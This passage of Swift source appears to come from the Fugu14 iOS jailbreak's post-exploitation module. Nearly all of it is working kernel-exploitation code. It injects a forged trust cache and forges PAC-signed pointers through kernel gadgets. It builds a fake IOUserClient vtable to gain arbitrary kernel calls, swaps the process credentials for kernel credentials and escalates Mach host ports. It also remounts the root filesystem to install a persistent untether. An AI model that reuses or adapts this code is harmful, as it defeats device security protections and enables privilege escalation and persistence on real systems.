try mem.writeBytes(virt: ourTc + 0x4, data: "Fugu14 Jailbreak".data(using: .utf8)!)
try mem.w32(virt: ourTc + 0x14, data: space)
// Now inject our tc
// Make sure this is atomic
while true {
// Read current
let cur = UInt64(bitPattern: pmap_image4_trust_caches.pointee)
// Write into our list entry
try mem.w64(virt: listEntry, data: cur)
// Attempt to replace
if OSAtomicCompareAndSwap64(Int64(bitPattern: cur), Int64(bitPattern: listEntry), pmap_image4_trust_caches) {
break
}
}
return ourTc
#endif
fatalError("not implemented")
}
func pacda(value: UInt64, context: UInt64, blendFactor: UInt16? = nil) throws -> UInt64 {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
var ctx = context
if let factor = blendFactor {
ctx = (ctx & ~0xFFFF000000000000) | (UInt64(factor) << 48)
}
let callThread = self.callThread!
let buf = callThread.stackPtr - 0x7FF0
var state = arm_thread_state64_t()
state.__x.1 = value
state.__x.2 = 0
state.__x.8 = buf
state.__x.9 = ctx
_ = try _kcall(function: slide(offsets.functions.pacdaGadget), state: state)
return try mem.r64(virt: buf)
}
// WARNING: Patchfinder currently doesn't find the required gadget
// Calling this function *will* trigger a panic
func pacia(value: UInt64, context: UInt64, blendFactor: UInt16? = nil) throws -> UInt64 {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
var ctx = context
if let factor = blendFactor {
ctx = (ctx & ~0xFFFF000000000000) | (UInt64(factor) << 48)
}
var state = arm_thread_state64_t()
state.__x.8 = 0xDEADBEEF
state.__x.16 = value
state.__x.17 = ctx
state.__cpsr = 0x40000000
return try _kcall(function: slide(offsets.functions.paciaGadget), state: state)
}
static let copyout_atomic32_address: UInt64 = 0xfffffff00826dcfc
static let copyout_atomic32_pacia_address: UInt64 = 0xfffffff00826dd1c
var copyout_atomic32_saved_br_x22_lr: UInt64 = 0
func setupPaciaBadly() throws {
guard let callThread = callThread else {
throw PostExploitationError.noKernelThread
}
// we need a fake return address that can stand up to retab
// so we need to call copyout_atomic32 once, and grab its signed return address off the stack
let buf = callThread.stackPtr - 0x7FF0
// copyout_atomic32(0x12345678, buf);
// we don't care about it actually writing; I just need the stack
_ = try kcall(function: slide(PostExploitation.copyout_atomic32_address),
p1: 0x12345678, p2: buf)
let lraddr = callThread.x22Ptr - 0xB0 + (30 * 8)
let lrvalue = try mem.r64(virt: lraddr)
print(String(format: "lrvalue = %lx", lrvalue))
copyout_atomic32_saved_br_x22_lr = lrvalue
}
func paciaBadly(value: UInt64, context: UInt64, blendFactor: UInt16? = nil) throws -> UInt64 {
// copy of pacia, but with copyout_atomic32 instead.
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
guard let callThread = callThread else {
throw PostExploitationError.noKernelThread
}
var ctx = context
if let factor = blendFactor {
ctx = (ctx & ~0xFFFF000000000000) | (UInt64(factor) << 48)
}
let buf = callThread.stackPtr - 0x7FF0
let brX22Gadget = slide(offsets.functions.brX22)
// We set up a fake stack frame
var state = arm_thread_state64_t()
state.__x.0 = 0x12345678
state.__x.1 = buf
state.__x.16 = ctx
state.__x.17 = value
state.__fp = callThread.stackPtr - 16
state.__sp = callThread.stackPtr - 16
state.__lr = 0xaaaabbbbccccdddd
state.__pc = slide(PostExploitation.copyout_atomic32_pacia_address)
state.__x.21 = callThread.returnState
state.__x.22 = brX22Gadget
// on stack: old fp
try mem.w64(virt: callThread.stackPtr - 16, data: callThread.stackPtr)
// and old lr
try mem.w64(virt: callThread.stackPtr - 8, data: copyout_atomic32_saved_br_x22_lr)
_ = try _kcall(function: 0, state: state, x1out: nil, dontTouchMyGarbage: true)
let x17addr = callThread.x22Ptr - 0xB0 + (17 * 8)
return try mem.r64(virt: x17addr)
}
func getPortPointer(_ port: mach_port_t) throws -> UInt64 {
guard let tbl = thisProc.task?.itk_space?.is_table else {
throw PostExploitationError.failedToGetPortTable
}
let kPort = try mem.rPtr(virt: tbl + (UInt64(port >> 8) * 0x18))
return kPort
}
func getPortKobject(_ port: mach_port_t) throws -> UInt64 {
let kPort = try getPortPointer(port)
// Get it's bits
let bits = try mem.r32(virt: kPort)
if (bits & 0x400) != 0 {
// Labeled, return kobject from label
let label = try mem.rPtr(virt: kPort + 0x68)
return try mem.rPtr(virt: label + 0x8)
}
// Not labeled
return try mem.rPtr(virt: kPort + 0x68)
}
func fixPMBug() throws {
// After *hours* of testing, @Pwn20wnd and I *finally* came up with a solution
// Apparently, loading codeless kexts causes freezes to happen
// No idea why, but unloading them fixes the bug
// Requires kcall unfortunately :/
var kr: kern_return_t = 0
if let loaded = try? sendKextRequestWithReply(req: ["Kext Request Predicate": "Get All Load Requests", "Kext Request Arguments": ["Kext Request Info Keys": ["CFBundleIdentifier"]]], res: &kr) as? [String] {
Logger.print("Attempting to unload unneeded dexts!")
let gIOCatalogue = try mem.rPtr(virt: slide(offsets.gIOCatalogue))
let terminateDriversForModule = slide(offsets.functions.terminateDriversForModule)
// Allocate a buffer
// (Which we'll leak...)
let buf = try kcall(function: slide(offsets.functions.kalloc), p1: 1024)
for kext in loaded {
if kext.starts(with: "de.linushenze.pwn-") {
// Write name into our buffer...
try mem.writeBytes(virt: buf, data: kext.data(using: .utf8)! + Data(count: 1) /* null byte */)
// Try to unload it!
try kcall_oneshot(function: terminateDriversForModule, p1: gIOCatalogue, p2: buf, p3: 1)
}
}
Logger.print("Unloaded unneeded dexts!")
}
}
func giveKernelCreds(toProc: Proc? = nil) throws -> UInt64 {
let toProc = toProc ?? thisProc.unsafelyUnwrapped
let myCredAddr = toProc.addr + offsets.procStruct.ucred
let saved = try mem.r64(virt: myCredAddr)
let krnlCred = kernelProc.unsafelyUnwrapped.ucred!.addr
let signed = try pacda(value: krnlCred, context: myCredAddr, blendFactor: 0x84E8)
try mem.w64(virt: myCredAddr, data: signed)
return saved
}
func restoreCreds(saved: UInt64) throws {
let myCredAddr = thisProc.addr + offsets.procStruct.ucred
try mem.w64(virt: myCredAddr, data: saved)
}
@discardableResult
func untether() -> MountResult {
// Remove unused closures
if let closures = try? FileManager.default.contentsOfDirectory(atPath: untetherClFolder + "/Caches/com.apple.dyld") {
for c in closures {
let keep = [".", "..", "analyticsd.closure", "logd.closure", "stage2.closure"]
if !keep.contains(c) {
try? FileManager.default.removeItem(at: URL(fileURLWithPath: c, relativeTo: URL(fileURLWithPath: untetherClFolder + "/Caches/com.apple.dyld")))
}
}
}
do {
let mountRes = try MountPatch(pe: self).remount(launchd: launchdProc.unsafelyUnwrapped, installCallback: { mountPath in
// This should never happen
throw PostExploitationError.untetherNotInstalled
})
return mountRes
} catch PostExploitationError.failedToFindLaunchd {
return .failed(reason: "Failed to find launchd")
} catch _ {
return .failed(reason: "Failed to mount root fs")
}
}
func install(doUpdate: Bool = false) -> MountResult {
func checkForFile(withName name: String, env: String, acCheck: Int32 = R_OK) -> String? {
var file: String?
if let dir = Bundle.main.resourcePath {
file = dir + "/" + name
}
if let fileEnv = getenv(env) {
file = String(cString: fileEnv)
}
guard file != nil else {
Logger.print("\(name) not found!")
return nil
}
guard access(file, acCheck) == 0 else {
Logger.print("\(name) failed perm check!")
return nil
}
return file
}
// Check for tar
guard let tar = checkForFile(withName: "tar", env: "FUGU_TAR") else {
return .failed(reason: "Tar not found!")
}
chmod(tar, 0o777)
guard access(tar, X_OK) == 0 else {
Logger.print("Tar not executable!")
return .failed(reason: "Tar not executable!")
}
// Check for bootstrap
guard let bootstrap = checkForFile(withName: "bootstrap.tar", env: "FUGU_BOOTSTRAP") else {
return .failed(reason: "Bootstrap not found!")
}
// Check for trustcache
guard let trustcache = checkForFile(withName: "trustcache", env: "FUGU_TRUSTCACHE") else {
return .failed(reason: "Trustcache not found!")
}
// Check for com.apple.analyticsd.plist
guard let svPlist = checkForFile(withName: "com.apple.analyticsd.plist", env: "FUGU_SERVICE_PLIST") else {
return .failed(reason: "Service plist not found!")
}
// Inject trust cache
guard injectTC(path: trustcache) else {
return .failed(reason: "Failed to inject trust cache")
}
do {
// Fix the power management bug
try fixPMBug()
// Mount the filesystem and install the untether
Logger.print("Mounting root file system...")
func installCallback(mountPath: String) throws {
// Extract tar
Logger.print("Extracting bootstrap...")
chdir(mountPath)
let res = runWithKCreds(pe: self, prog: tar, args: ["-xvf", bootstrap])
guard res else {
throw PostExploitationError.failedToExtractBootstrap
}
if !fastUntetherEnabled {
// Copy service plist
Logger.print("Copying service plist...")
try? FileManager.default.createDirectory(atPath: mountPath + "/Library/LaunchDaemons", withIntermediateDirectories: true, attributes: [.posixPermissions: 0o755, .ownerAccountID: 0, .groupOwnerAccountID: 0])
try? FileManager.default.removeItem(atPath: mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist")
try FileManager.default.copyItem(atPath: svPlist, toPath: mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist")
chmod(mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist", 0o644)
chown(mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist", 0, 0)
// Ensure launchctl exists and is executable
guard access(mountPath + "/.Fugu14Untether/bin/launchctl", X_OK) == 0 else {
throw PostExploitationError.launchctlCheckFailed
}
}
// If this is an AltStore build, write magic file
if altStoreBuild {
creat(mountPath + "/.Fugu14Untether/.AltStoreInstall", 0o666)
}
// Install untether
Logger.print("Installing untether...")
if fastUntetherEnabled {
Logger.print("!!! FAST UNTETHER ENABLED !!!")
try installFastUntether(mountPath: mountPath, trustcache: trustcache, isUpdate: doUpdate)
} else {
try installSlowUntether(mountPath: mountPath, trustcache: trustcache, isUpdate: doUpdate)
}
}
if !doUpdate {
let result = try MountPatch(pe: self).remount(launchd: launchdProc.unsafelyUnwrapped, installCallback: installCallback)
if case .ok = result {
// Apparently, the user was already jailbroken
// The rootfs is now mounted r/w
// Check if there is at least one snapshot
// Otherwise, create one
if fastUntetherEnabled {
Logger.print("!!! REFUSING TO INSTALL FAST UNTETHER !!!")
Logger.print("!!! PLEASE RESTORE ROOTFS FIRST !!!")
return .failed(reason: "Refusing to install fast untether - restore RootFS first!")
}
Logger.print("RootFS not snapshot mounted")
Logger.print("Checking if at least one snapshot exists")
var res: MountResult = .failed(reason: "Unknown error!")
_ = withFD(file: "/") { fd in
var attr = attrlist()
guard let buf = malloc(2048) else {
Logger.print("Malloc failed!")
res = .failed(reason: "Malloc failed!")
return false
}
defer { free(buf) }
attr.commonattr = ATTR_BULK_REQUIRED
let count = fs_snapshot_list(fd, &attr, buf, 2048, 0)
guard count >= 0 else {
Logger.print("fs_snapshot_list failed!")
res = .failed(reason: "fs_snapshot_list failed!")
return false
}
if count == 0 {
Logger.print("No snapshot found. Creating one.")
guard fs_snapshot_create(fd, "orig-fs", 0) == 0 else {
Logger.print("Failed to create snapshot!")
res = .failed(reason: "Failed to create snapshot!")
return false
}
Logger.print("Created orig-fs snapshot, continuing install")
} else {
Logger.print("At least one snapshot exists, continuing install")
}
// There was at least one snapshot or we created one
// Allow the install to continue
do {
try installCallback(mountPath: "/")
res = .rebootRequired
return true
} catch let e {
res = .failed(reason: "Failed to install untether: \(e)")
}
return false
}
return res
}
return result
} else {
do {
try installCallback(mountPath: "/")
return .rebootRequired
} catch let e {
return .failed(reason: "Failed to update untether: \(e)")
}
}
} catch PostExploitationError.failedToFindLaunchd {
return .failed(reason: "Failed to find launchd")
} catch let e {
return .failed(reason: "Failed to install untether: \(e)")
}
}
static func uninstall() -> RestoreResult {
Logger.print("Uninstalling untether")
let restoreRes = MountPatch.restoreRootfs()
if case .rebootRequired = restoreRes {
// Remove untether
try? FileManager.default.removeItem(atPath: untetherContainerPath)
chflags(untetherClPathLogd, 0)
chflags(untetherClPathAnalytics, 0)
chflags(untetherClPathPs, 0)
try? FileManager.default.removeItem(atPath: untetherClFolder)
}
return restoreRes
}
func mountOnly() {
Logger.print("Remounting root fs")
let res = MountPatch(pe: self).remount(launchd: launchdProc.unsafelyUnwrapped) { mntPath in
// Nothing
}
Logger.print("Mount result: \(res)")
}
@discardableResult
func injectTC(path: String) -> Bool {
guard let data = try? Data(contentsOf: URL(fileURLWithPath: path)) else {
Logger.print("Failed to read trust cache!")
return false
}
// Make sure the trust cache is good
guard data.count >= 0x18 else {
Logger.print("Trust cache is too small!")
return false
}
let vers = data.getGeneric(type: UInt32.self)
guard vers == 1 else {
Logger.fmt("Trust cache has bad version (must be 1, is %u)!", vers)
return false
}
let count = data.getGeneric(type: UInt32.self, offset: 0x14)
guard data.count == 0x18 + (Int(count) * 22) else {
Logger.fmt("Trust cache has bad length (should be %p, is %p)!", 0x18 + (Int(count) * 22), data.count)
return false
}
Logger.print("Trust cache looks good, attempting to load...")
do {
// Setup kernel call
Logger.print("Setting up kernel call gadget...")
if !setupKernelCall() {
Logger.print("Failed to set up kernel call gadget!")
exit(-1)
}
Logger.print("Injecting trust cache...")
// Create empty trust cache, then replace it's content
let tcKern = try injectEmptyTrustCache(space: count)
try mem.writeBytes(virt: tcKern + 0x18, data: data.tryAdvance(by: 0x18))
Logger.print("Successfully injected trust cache!")
return true
} catch let e {
Logger.print("Failed, error: \(e)")
}
return false
}
func killMe() {
if userClient != 0 {
do {
try destroyIOConnectTrap6Port()
} catch let e {
print("Can't destroyIOConnectTrap6Port: \(e)")
}
}
if callThread != nil {
kill(callThread.unsafelyUnwrapped.pid, SIGKILL)
}
// Kill myself
kill(getpid(), SIGKILL)
}
func initKrwSupport() -> Int32 {
do {
// Prepare all stuff
let info = mem.getKrwData()
var magicData = Data(fromObject: 0x75677546 as UInt32)
magicData.appendGeneric(value: info.dkSvPort)
magicData.appendGeneric(value: info.ucPort)
magicData.appendGeneric(value: info.physMemDesc)
magicData.appendGeneric(value: info.dmaPort)
magicData.appendGeneric(value: info.dmaDesc)
magicData.appendGeneric(value: info.mapAddr)
// Allocate a "magic" page
var addr: vm_address_t = 0
var kr = vm_allocate(mach_task_self_, &addr, 0x100, VM_FLAGS_ANYWHERE)
guard kr == KERN_SUCCESS else {
return 1
}
// Write address into dyld infos
var dyldInfo = task_dyld_info()
var infoCnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: dyldInfo) >> 2)
kr = withUnsafeMutablePointer(to: &dyldInfo) { ptr in
task_info(mach_task_self_, task_flavor_t(TASK_DYLD_INFO), task_info_t(OpaquePointer(ptr)), &infoCnt)
}
guard kr == KERN_SUCCESS else {
return 6
}
let ptr = UnsafeMutablePointer<vm_address_t>(bitPattern: UInt(dyldInfo.all_image_info_addr) + 0xFF0)!
ptr.pointee = addr
// Write data to "magic" page
magicData.copyBytes(to: UnsafeMutablePointer<UInt8>(bitPattern: addr)!, count: magicData.count)
// Patch mach host port
// Find a process which does not have a privileged host port
var cur: Proc! = Proc.getFirstProc(pe: self)
var hostPort: mach_port_t = 0
while cur != nil {
if let uid = cur.ucred?.cr_uid {
if uid == 501 {
// Okay, try to get the host port from this process
var tp: mach_port_t = 0
kr = task_for_pid(mach_task_self_, Int32(bitPattern: cur.pid), &tp)
if kr == KERN_SUCCESS {
kr = task_get_special_port(tp, TASK_HOST_PORT, &hostPort)
mach_port_deallocate(mach_task_self_, tp)
if kr == KERN_SUCCESS {
break
}
}
}
}
cur = cur.next
}
guard hostPort != 0 else {
return 2
}
defer { mach_port_deallocate(mach_task_self_, hostPort) }
// Get the unprivileged host port
guard let tbl = thisProc.task?.itk_space?.is_table else {
return 3
}
let port = try mem.rPtr(virt: tbl + (UInt64(hostPort >> 8) * 0x18))
let bits = try mem.r32(virt: port)
guard bits == 0x80000803 else {
return 4
}
// Make it privileged
try mem.w32(virt: port, data: 0x80000804)
func unlabelPort(_ port: mach_port_t) throws {
let kPort = try mem.rPtr(virt: tbl + (UInt64(port >> 8) * 0x18))
// Get the label pointer
let labelPtr = try mem.rPtr(virt: kPort + 0x68)
// Unlabel
try mem.w64(virt: labelPtr, data: 0)
}
// Unlabel DriverKit ports
do {
try unlabelPort(info.dkSvPort)
try unlabelPort(info.ucPort)
try unlabelPort(info.physMemDesc)
try unlabelPort(info.dmaPort)
try unlabelPort(info.dmaDesc)
} catch _ {
return 5
}
// Make our task port moveable
let kTaskPort = try mem.rPtr(virt: tbl + (UInt64(mach_task_self_ >> 8) * 0x18))
try mem.w16(virt: kTaskPort + 0x26, data: 0)
mach_port_insert_right(mach_task_self_, mach_task_self_, mach_task_self_, mach_msg_type_name_t(MACH_MSG_TYPE_COPY_SEND))
typealias fType = @convention(c) () -> pid_t
let fork = unsafeBitCast(dlsym(dlopen(nil, 0), "fork"), to: fType.self)
let child = fork()
if child == 0 {
// Set us as HOST_CLOSURED_PORT
var parentTP: mach_port_t = 0
kr = task_for_pid(mach_task_self_, getppid(), &parentTP)
guard kr == KERN_SUCCESS else {
exit(kr)
}
kr = host_set_special_port(mach_host_self(), HOST_CLOSURED_PORT, parentTP)
exit(kr)
}
var status: Int32 = 0
waitpid(child, &status, 0)
return status
} catch {
return 1337
}
}
// two instructions past thread_call_invoke
// found by searching braa x3, x4
static let thread_call_invoke_past_two:UInt64 = 0xfffffff007bbce3c;
// search for 00 00 01 91 c0 03 5f d6
static let add_x0_x0_0x40_ret_gadget:UInt64 = 0xfffffff007bc0e70;
// used a print statement (the realVtable line below)
let startOfUserClientVtable:UInt64 = 0xfffffff0079529d0
let endOfUserClientVtable:UInt64 = 0xfffffff007952fa8
var userClient:mach_port_t = 0
var userClientPortAddr:UInt64 = 0
var userClientAddr:UInt64 = 0
// zhuowei: create a Mach port that allows calling kernel functions with 2 arguments.
// It's implemented as a fake IOUserClient pointed to thread_call_invoke:
// IOConnectTrap6(user_client, 0, arg1, arg2, function_ia_signed_ptr, discriminator)
// https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1731
func createIOConnectTrap6Port() throws -> mach_port_t? {
if userClient != 0 {
return userClient
}
let kexecuteGadgetUnsigned:UInt64 = slide(PostExploitation.add_x0_x0_0x40_ret_gadget)
// https://github.com/Odyssey-Team/Taurine/blob/0ee53dde05da8ce5a9b7192e4164ffdae7397f94/Taurine/post-exploit/utils/kexec/kexecute.swift#L42
let offset_ip_kobject:UInt64 = 0x68
let service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"))
var user_client = mach_port_t(MACH_PORT_NULL)
guard IOServiceOpen(service, mach_task_self_, 0, &user_client) == KERN_SUCCESS else {
return nil
}
userClientPortAddr = try getPortPointer(user_client)
let userClientBits = try mem.r32(virt: userClientPortAddr)
userClientAddr = try mem.r64(virt: userClientPortAddr + offset_ip_kobject)
print(String(format: "userClientPortAddr = %lx userClientBits = %lx userClientAddr = %lx", userClientPortAddr, userClientBits, userClientAddr))
//return nil
let fakeVtable = try kcall(function: slide(offsets.functions.kalloc), p1: 0x2000)
let fakeUserClient = fakeVtable + 0x1000
guard fakeVtable != 0,
fakeUserClient != 0 else {
return nil
}
print("Defense Matrix activated!")
print(String(format: "fake vtable: 0x%llx, fake user client: 0x%llx", fakeVtable, fakeUserClient))
// TODO(zhuowei)
// Note that this is different from
// https://github.com/apple/llvm-project/blob/apple/main/clang/docs/PointerAuthentication.rst#c-virtual-tables
// the blend factors: 1) got from iokit_user_client_trap disassembly
let fakeVtableSigned = try pacda(value: fakeVtable,
context: fakeUserClient, blendFactor: 0xcda1)
// 2) put XNU_PTRAUTH_SIGNED_PTR("ipc_port.kobject") into a C file and compiled
let fakeUserClientSigned = try pacda(value: fakeUserClient,
context: userClientPortAddr + offset_ip_kobject, blendFactor: 0xb527)
// 3) checked getTargetAndTrapForIndex
let kexecuteGadget:UInt64 = try paciaBadly(value: kexecuteGadgetUnsigned,
context: fakeVtable + UInt64(8 * 0xb8), blendFactor: 0xea23)
// 4) iokit_user_client_trap
let threadCallInvokePastTwoSigned:UInt64 = try paciaBadly(value: slide(PostExploitation.thread_call_invoke_past_two), context: 0x705d)
print(String(format: "fake vtable signed: 0x%llx, fake user client signed: 0x%llx, gadget signed: 0x%llx",
fakeVtableSigned, fakeUserClientSigned, kexecuteGadget))
let signedVtable = try bulkSignVtable(newTableBase: fakeVtable)
//let realVtable = try mem.r64(virt: stripPtr(userClientAddr))
//print(String(format: "real vtable = %lx (%lx unslid)", realVtable, stripPtr(realVtable) - mem.kernelSlide))
//let vtableData = try mem.readBytes(virt: stripPtr(realVtable), count: 0x1000)
try mem.writeBytes(virt: fakeVtable, data: signedVtable)
// thankfully nothing in IOUserClient is signed...
let realUserClientData = try mem.readBytes(virt: stripPtr(userClientAddr), count: 0x1000)
try mem.writeBytes(virt: fakeUserClient, data: realUserClientData)
try mem.w64(virt: fakeVtable + UInt64(8 * 0xb8), data: kexecuteGadget)
try mem.w64(virt: fakeUserClient, data: fakeVtableSigned)
try mem.w64(virt: userClientPortAddr + offset_ip_kobject, data: fakeUserClientSigned)
try mem.w64(virt: fakeUserClient + 0x40, data: 0x12345678facef00d)
try mem.w64(virt: fakeUserClient + 0x48, data: threadCallInvokePastTwoSigned)
try mem.w64(virt: fakeUserClient + 0x50, data: 0)
userClient = user_client
return user_client
}
func bulkSignVtable(newTableBase: UInt64) throws -> Data {
let unslidVirtBase:UInt64 = 0xFFFFFFF007004000;
let beginVtableInKernelFile = startOfUserClientVtable - unslidVirtBase
let vtableSize = endOfUserClientVtable - startOfUserClientVtable
let slicedVtable = MemoryAccess.kernelFromDisk[beginVtableInKernelFile..<(beginVtableInKernelFile + vtableSize)]
let newKernelBase = slide(unslidVirtBase)
// bad implementation of rebase_chain
var signedVtable = Data(count: Int(vtableSize))
for index in 0..<(vtableSize / 8) {
let byteOffset = index * 8
let value = slicedVtable.getGeneric(type: UInt64.self, offset: UInt(byteOffset))
let newPointer = newKernelBase + (value & 0xffffffff)
let newLocation = newTableBase + byteOffset
let discriminator = (value >> 32) & 0xffff
let tableSigned:UInt64 = try paciaBadly(value: newPointer, context: newLocation, blendFactor: UInt16(discriminator))
//print(String(format: "%x value = %lx discriminator = %lx newPointer = %lx newLocation = %lx tableSigned = %lx", index, value, discriminator, newPointer, newLocation, tableSigned))
signedVtable[byteOffset..<(byteOffset + 8)] = Data(fromObject: tableSigned)
}
return signedVtable
}
func destroyIOConnectTrap6Port() throws {
let offset_ip_kobject:UInt64 = 0x68
try mem.w64(virt: userClientPortAddr + offset_ip_kobject, data: userClientAddr)
IOServiceClose(userClient)
}
let hvHeapAddress:UInt64 = 0xfffffff009b43190
let zone_create_ext:UInt64 = 0xfffffff007bd43bc;
let hv_vm_string:UInt64 = 0xfffffff00745a056;
func initializeHvHeap() throws {
let currentHeap = try mem.r64(virt: slide(hvHeapAddress))
if currentHeap != 0 {
return
}
let newHeap = try kcall(function: slide(zone_create_ext), p1: slide(hv_vm_string),
p2: 0x2080, p3: 0x10000000, p4: 0xffff, p5: 0)
try mem.w64(virt: slide(hvHeapAddress), data: newHeap)
}
deinit {
killMe()
}
}